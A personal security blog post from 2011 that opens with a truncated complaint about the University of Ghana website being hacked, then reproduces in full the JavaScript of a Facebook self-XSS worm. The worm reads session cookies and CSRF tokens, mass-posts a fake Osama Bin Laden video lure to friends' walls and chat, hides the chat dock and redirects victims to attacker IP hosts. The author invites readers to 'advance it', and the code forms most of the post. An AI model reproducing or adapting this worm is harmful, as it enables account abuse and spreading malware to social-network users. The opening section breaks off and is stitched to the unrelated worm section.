2011/05/06

University of Ghana Website hacked for 2+ years

I complained about University of Ghana being hacked by "someone" and having
cloaked ads inserted into their pages, well it seems no one took notice of this

So am going to loud mouth more details, remember this is not to disgrace or
tarnish the image of the webmaster of the University of Ghana website but it
is to awaken the spleepy and often loud and uneducatated bureaucrats in Ghana
at large. The problem with Ghana is more and more people are beginning to see
the advantages of IT and are greedily trying to squeeze everything out of anyone
that has knowledge or skills in this field.

Your site is hacked!, is a very scary statement and if I should approach them
I would get the you did huh! question which would piss me off and I'll probalbly
slap the shit out of someone in order to avoid that I can blog :)

To verify this absurd claim from moi(laudarch) do the following

its been a while so i just share.

Facebook Worm

Hello its been really long and a lot of things have happened, anyways I would tell you about the later.

What I want to talk about now is a facebook work I got a couple of days ago
I received a mail from a facebook friend and it had a very suspicious title


"
This will leave you speechless)
http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791
Osama Bin Laden EXECUTION Video!
Navy Seals raid Bin Ladens hideout and execute him!
"

weird huh even CNN didn't show a video so how come this group has it.
The page has been currently re moved. Its funny when these things happen
and people fall for it anyways. it had instructions on copy and paste a javascript
code in your address bar after you are logged in to facebook.

The interesting thing about this worm is how it spreads
it uses the "stupidity" of Humans. Yes stupidity!

I and my brother tried designing a worm on facebook once and we came up
with different algorithms on how to spread using apps mailling
and posting comments, and this all could not be automatic, I even came up
with mozilla extensions to do the job.


The future of worms and viruses is social networking, I watched as the group
grew from 8,000 to 60,000+ in less than two hours now that is power given the
intelligence of the average joe and jane this would work for the next 10 to 15
years.

I copied the javascript code that spread on the victims wall and profile to the
victim's friends et al.

below is the code, learn from it advance it and be wise :)


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1  20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');

function readCookie(name) {
 
 var nameEQ = name + "=";
 var ca = document.cookie.split(';');
 for(var i=0;i < ca.length;i++) {
  var c = ca[i];
  while (c.charAt(0)==' ') c = c.substring(1,c.length);
  if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
 }
 return null;

}

var user_id = readCookie("c_user");


// Setup some variables

var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;


// Multiple URL Shorteners

var shortArray = new Array(
      "http://ow.ly/4LNpd",
      "http://clickily.ws/zyaeom"
     );

var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];

// Chat message variables

var this_chat = "See the Osama Bin Laden EXECUTION Video! facebook.com/pages/Bin-Laden-Execution-Video/207043242659899?";
var prepared_chat = encodeURIComponent(this_chat);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var token = Math.round(new Date().getTime() / 1000);

var http1 = new XMLHttpRequest();

var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";

var params1 = "";
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.

 if(http1.readyState == 4 && http1.status == 200) { // If state = success
  
  var response1 = http1.responseText;
  
  response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  response1 = JSON.parse(response1); // Convert the response to JSON
  
  //alert(response4.toSource());
  
  var count = 0;
  
  for(uid in response1.payload.entries){
   
   if(count < 400){
    
    //alert("SENT TO "+response1.payload.entries[count].uid);

    // Loop to send messages
   
    // New XMLHttp object
    var httpwp = new XMLHttpRequest();
       
    var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
    var randLink = new Array("http://www.facebook.com/pages/Bin-Laden-Execution-Video/219092901450281?", "http://www.facebook.com/pages/Bin-Laden-Execution-Video/128399103901791?");
    var statusmessage="This will leave you speechless";
    var title="Osama Bin Laden EXECUTION Video!";
//    var link="http://clickily.ws/e4lqeg?http://clickily.ws/y2ls36?";
    var link = randLink[Math.floor(randLink.length*Math.random())];
    var description="Navy Seals raid Bin Ladens hideout and execute him! ";
    var picture="http://cooldadssz.co.cc/laden.png";
    
    var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
    
    httpwp.open("POST", urlwp, true);
    
    //Send the proper header information along with the request
    
    httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpwp.setRequestHeader("Content-length", paramswp.length);
    httpwp.setRequestHeader("Connection", "keep-alive");     
    
    httpwp.onreadystatechange = function() { //Call a function when the state changes.
     if(httpwp.readyState == 4 && httpwp.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }

    }

    httpwp.send(paramswp);
 
   }

   count++; // increment counter
  
  }
    
  http1.close; // Close the connection
  
  
  
 }
 
}

http1.send(null);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var hide = document.getElementById('fbDockChatTabSlider');

hide.style.display = "none";


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http3 = new XMLHttpRequest();

var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);

//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close");

http3.onreadystatechange = function() {//Call a function when the state changes.
 if(http3.readyState == 4 && http3.status == 200) {
  
  var response3 = http3.responseText;
  
  response3 = response3.replace("for (;;);", "");
  response3 = JSON.parse(response3);
  
  var count = 0;
  
  for(property in response3.payload.buddy_list.nowAvailableList){
   
   if(count < 100){
    
    // Loop to send messages
   
    // New XMLHttp object
    var httpc = new XMLHttpRequest();
    
    // Generate random message ID
        
    var msgid = Math.floor(Math.random()*1000000);
    
    var time = Math.round(new Date().getTime() / 1000);
    
    var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
    var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
    httpc.open("POST", urlc, true);
    
    //Send the proper header information along with the request
    httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    httpc.setRequestHeader("Content-length", paramsc.length);
    httpc.setRequestHeader("Connection", "close");
    
    httpc.onreadystatechange = function() { //Call a function when the state changes.
     if(httpc.readyState == 4 && httpc.status == 200){
      //alert(http.responseText);
      //alert('buddy list fetched');
     }
    }
    httpc.send(paramsc);
 
   }
   
   //alert(property);
   count++; // increment counter
  
  }
  
  http3.close; // Close the connection
  
 }
}
http3.send(params3);







/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http4 = new XMLHttpRequest();

var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params4 = "fbpage_id=193321447379497&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http4.open("POST", url4, true);

//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");

http4.onreadystatechange = function() {//Call a function when the state changes.
 if(http4.readyState == 4 && http4.status == 200) {
   
  http4.close; // Close the connection
  
 }
}
http4.send(params4);


///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////

var http5 = new XMLHttpRequest();

var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";

var params5 = "fbpage_id=182116595173798&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"

http5.open("POST", url5, true);

//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close");

http5.onreadystatechange = function() {//Call a function when the state changes.
 if(http5.readyState == 4 && http5.status == 200) {
   
  http5.close; // Close the connection
  
 }
}
http5.send(params5);
*/

//document.getElementById('susta').style.display="none"; 
document.getElementById('contentArea').innerHTML="
< center>
< img src="http://www.hindustantimes.com/images/loading_gif.gif" />;
Please wait...";
var endArray = new Array("184.171.167.195", "67.23.246.232", "174.140.165.27", "74.63.214.230");


var ending = endArray[Math.floor(endArray.length*Math.random())];
setTimeout("window.location = 'http://'+ending+'/end.php';", 15000); 

As you can see this worm was written very well with everything happening in the background
thanks to the power of AJAX.

Am going to take time and fully reverse this and add comments on how to extend until then am writing something else :)
oh have to post avirii I have been reversing for some time now :)